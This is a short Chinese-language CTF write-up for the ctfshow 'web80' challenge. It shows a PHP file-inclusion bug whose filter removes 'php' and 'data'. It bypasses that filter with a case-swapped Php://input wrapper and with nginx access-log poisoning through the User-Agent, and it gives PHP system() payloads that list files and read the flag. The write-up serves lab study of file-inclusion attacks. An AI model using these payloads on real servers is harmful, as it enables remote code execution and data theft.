[ctfshow web入门] web80

信息收集

过滤了php和data

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功，有知道的大佬也可以在评论区教我一手

?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式，basic模式下服务器无法收到任何post数据

---

日志绕过

?file=/var/log/nginx/access.log

user-agent里写上

<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

---

web79    目录    web81